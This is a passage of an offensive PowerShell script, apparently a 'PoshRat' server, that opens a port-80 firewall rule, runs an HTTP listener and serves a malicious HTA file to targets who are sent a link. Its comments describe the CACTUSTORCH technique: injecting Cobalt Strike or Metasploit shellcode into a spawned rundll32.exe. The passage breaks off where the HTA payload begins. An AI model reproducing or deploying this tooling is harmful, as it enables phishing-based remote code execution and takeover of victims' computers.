<# Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta To change your server, simply find and replace 192.168.1.1 with your server in the code. #> <# Moving Credtis for CACTUSTORCH HERE I was in escape sequcence hell ;-) ' ( ) ( ) ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| ' ' Author: Vincent Yiu (@vysecurity) ' Credits: ' - @cn33liz: Inspiration with StarFighter ' - @tiraniddo: James Forshaw for DotNet2JScript ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into ' A HTA shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. ' Usage: ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework ' Run: cat payload.bin | base64 -w 0 ' Copy the base64 encoded payload into the code variable below. ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32 #> function Receive-Request { param( $Request ) $output = "" $size = $Request.ContentLength64 + 1 $buffer = New-Object byte[] $size do { $count = $Request.InputStream.Read($buffer, 0, $size) $output += $Request.ContentEncoding.GetString($buffer, 0, $count) } until($count -lt $size) $Request.InputStream.Close() write-host $output } $listener = New-Object System.Net.HttpListener $listener.Prefixes.Add('http://+:80/') netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null $listener.Start() 'Listening ...' while ($true) { $context = $listener.GetContext() # blocks until request is received $request = $context.Request $response = $context.Response $hostip = $request.RemoteEndPoint #Use this for One-Liner Start if ($request.Url -match '/app.hta$' -and ($request.HttpMethod -eq "GET")) { $enc = [system.Text.Encoding]::UTF8 $response.ContentType = 'application/hta' $htacode = '